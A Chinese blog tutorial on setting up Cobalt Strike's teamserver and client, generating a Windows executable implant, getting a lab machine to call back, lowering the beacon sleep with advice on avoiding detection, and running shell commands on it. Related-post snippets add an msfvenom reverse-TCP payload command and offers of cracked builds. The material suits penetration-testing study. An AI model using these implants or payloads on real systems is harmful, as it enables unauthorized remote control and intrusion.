内网神器-cobaltstrike的安装使用

最新推荐文章于 2023-06-07 10:13:13 发布
最新推荐文章于 2023-06-07 10:13:13 发布
阅读量2.2k 收藏 5
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43815032/article/details/103253578
版权

1、Cobaltstrike简介

Cobalt Strike是一款美国Red Team开发的神器,常被业界人称为CS。以Metasploit为基础的GUI框架式工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。主要用于团队作战,可谓是团队必备神器,能让多个测试人员同时连接到团体服务器上,共享测试资源与目标信息和sessions。

(官网:cobaltstrike.com/

v2-797bb7bab928d03bd5d2302947ffacc6_b.jpg

2、Cobaltstrike架构


Cobalt Strike分为客户端和服务器组件。该服务器称为团队服务器,是Beacon Payload 的控制器,也是Cobalt Strike社交工程功能的主机。团队服务器还存储Cobalt Strike收集的数据,并管理日志记录。


Cobalt Strike团队服务器必须在受支持的Linux系统上运行。要启动Cobalt Strike团队服务器,请使用Cobalt Strike Linux软件包附带的teamserver脚本。

v2-a5796037d2f2d208c3aa3fb9174e524e_b.jpg


3、Cobaltstrike安装


备注:Cobalt Strike需要Oracle Java 1.8,Oracle Java 11或OpenJDK 11的环境。


3.1.首先我们在我们的CS服务器上下载三个文件,分别为:cobaltstrike.auth、cobaltstrike.jar、teamserver。并且在cs服务器上启动服务。


命令如下:

Chmod 755

./teamserver ip password(ip和密码自填)

v2-d295174a57de7d0c23c3ff8da1dbce37_b.jpg



3.2启动CS客户端,如图:

v2-2ebdafd62063086ebbd93dc4c530f95c_b.jpg


3.3.启动客户端之后,输入我们服务端的ip地址和端口,用户名自填,密码为我们刚起执行teamserver脚本时的密码。如图:

v2-dbd2878d6261f46a50e896b5e484f45a_b.jpg


3.4.连接成功之后,Cobalt Strike将询问是否识别此团队服务器的SHA256哈希值。如果这样做,请按OK,Cobalt Strike客户端将连接到服务器。Cobalt Strike还会记住这个SHA256哈希,以便将来连接。可以通过Cobalt Strike - >Preferences - > Fingerprints管理这些哈希值。

v2-806a9299f1764ac3998b51c250970996_b.jpg

v2-72bcd2b11536b5524ba51dcc25615ebb_b.jpg



4、Cobaltstrike使用


4.1.创建本地监听listen


Cobalt Strike->Listeners ,然后点击Add便可以创建自己想要的Listeners了。如图

v2-2d041f6be88da9f924a28181d9cf894d_b.jpg




4.2.生成一个exe的程序

Attacks- Packages-Windows Executable,可以生成一个可执行的程序,如图:

v2-536d58666cdd9ace34fe57a1842c0d79_b.jpg

v2-5fcc223edb1258da634df85258833510_b.jpg



4.3.将可执行的程序放置到我们的实验靶机上,并且双击执行,可以在任务管理器看到我们的程序已经在运行了。



v2-da71520b15784524e4ab59f6333b4430_b.jpg



4.4.同时在我们的CS客户端,我们可以看到我们的靶机已经上线了。

v2-232257b3b9da305be8068584f00015c7_b.jpg



4.5.接着我们右键该靶机进入Interact,并且输入Sleep 0。指定被控端休眠时间,默认60秒一次回传,让被控端每10秒来下载一次任务,实际中频率不宜过快,容易被发现,80左右一次即可(本次实验我们用0延迟来做实验)

v2-65a55f3bf0d34557f0c2a7f6b24aec5e_b.jpg



4.6控制靶机之后,我们就可以执行命令,如:shell whomai。如图:

v2-7941511bebbc78bdd2f22b5a2cce07b5_b.jpg



破壳野生喵
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
在kali2020.4 linux 安装cobaltstrike4.2.docx
05-03
安装 cobaltstrike4.2
内网渗透工具CobaltStrike使用教程详解
热门推荐
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
05-31 2万+
内网渗透神奇CobaltStrike工具的使用教程,非常适合刚入手的新手,本文讲解了如何启动CobaltStrike,客户端连接团队服务端,配置监听器,生成木马,权限提升,命令执行以及内网横线穿透,插件加载,命令执行等操作,目标信息总结表(自动记忆保存),查看主机的文件和文件夹结构信息,以及利用CobaltStrike进行横向移动等绝大部分的功能,都做了演示和讲解。
CobaltStrike 4.3
08-07
CobaltStrike 4.3 free版本 自用存放,需要的私我,发你。
Cobalt Strike安装及获取靶机控制权(攻击)
dgjkkhcf的博客
07-25 1865
Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。......
CS4.9.1.1-CobaltStrike4.9.1.1版
最新发布
01-18
Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,...
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
Cobalt-Strike-4.5
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
cobaltstrike-linux.zip
07-09
标题 "cobaltstrike-linux.zip" 暗示了这是一个针对Linux系统的Cobalt Strike工具包。Cobalt Strike是一款广泛使用的网络安全评估工具,主要用于红队操作、渗透测试和模拟攻击,帮助安全专业人员评估组织的安全防护...
cobaltstrike多个版本
12-30
cobaltstrike4.3,cobaltstrike4.4,cobaltstrike4.5三个版本 安装教程以cs4.3为例: 1、xshell上传至kali,解压 unzip cobaltstrike 2、给cs的服务端teamserver和客户端start.sh执行权限 chmod +x teamserver start...
cobaltstrike4.0-cracked.zip
07-04
这是Cobalt Strike4.0的无后门版本,该版本仅供学习使用,请勿用于非法途径,请时刻遵守国家法律。
保姆级教学!小白也会的cobalt strike搭建
一只web狗
11-05 4522
小白也会的cobalt strike搭建,快速部署
推荐三款内网渗透神器!
jklove9的博客
03-02 3292
推荐三款内网渗透神器---fscan kscan RequestTemplate
CobaltStrike安装
m0_71518346的博客
06-07 1214
CobaltStrike 是一款渗透测试神器,被业界人称为 CS 神器CobaltStrike 分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStrike 集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大的功能!
Cobalt Strike使用 frp 内网穿透 上线
qq_41728581的博客
03-05 3325
首先需要公网ip 100多买了个国内的服务器 流泪了 要是路由器能获得公网ip多好 这里部署的是 cs server和client 在同一台内网主机上 如果不是 有些地方需要自行调整修改 云服务器 开启frps 首先在服务器上运行frps 精简配置就可以 (Ubuntu18开机自启 https://www.jianshu.com/p/9274b18b35e3/) frps.ini如下 [common] bind_port = 7000 如果想要转发 必须要开放防火墙 服务器的话就在安全组里边.
Cobalt srtike使用frp实现内网穿透
crowsec
10-20 2651
01背景介绍 在使用cobalt strike的场景中,很多时候会遇到内网机是Windows不出网,而外网机是Linux的,而且外网机只能获取到低权限来转发流量。如果此时想使用cobalt strike来横向的话,需要使用Linux机器作为跳板机来进行操作。 ...
CobaltStrike使用之如何上线
baidu_38844729的博客
11-22 1423
前言 已经拿到某台肉鸡的web权限,想进行后渗透攻击,进入内网收集信息,我们可以用到cobaltstrike msf反弹shell 1、制作反弹shell-exe文件在这里插入代码片 msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.10.10.159 lport=4444 -f exe -o abc.exe lhost:攻击机IP lport:监听端口 2、msf运行命令 msfconsle msf5 > use exploit/mu
Cobaltstrike安装和基本使用+MSF联动
向阳-Y.的博客
01-15 1万+
Cobaltstrike安装使用 cobaltstrike下载地址 下载好后,将cobaltstrike4.0-cracked.zip上传至服务器并解压,第一次运行需要安装java环境,安装完成后运行如下命令: ./teamserver 101.43.x.x password #这里的密码是一会要验证的密码,随便输入,ip是自己服务器的ip ...
Cobalt Strike4.0安装包(内附中文版)
梦之序章的博客
03-21 2万+
1.什么是 Cobalt Strike Cobalt Strike 是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁 者的后渗透行动。 Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、W...
cobaltstrike使用
09-14
为了使用CobaltStrike工具,首先需要安装Java环境。根据引用中的信息,在Kali系统上使用jdk11,在两台Windows 7系统上使用jdk1.8。 使用CobaltStrike的详细步骤如下: 1. 启动CobaltStrike团队服务器,可以使用命令"./teamserver 192.168.3.130 passwd"。 2. 客户端连接到团队服务器。 3. 配置监听器,以便监控目标系统。 4. 生成木马,可以通过CobaltStrike生成恶意软件。 5. 进行权限提升、命令执行以及内网渗透等操作。 6. 加载插件,可以扩展CobaltStrike的功能。 7. 执行命令等操作,进行渗透测试。 8. 查看主机的文件和文件夹结构信息等。 9. 进行横向移动,实现在内网中移动和渗透。 使用CobaltStrike工具需要一定的技术和安全知识。请确保你在合法的环境下使用该工具,并遵守相关法律法规。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值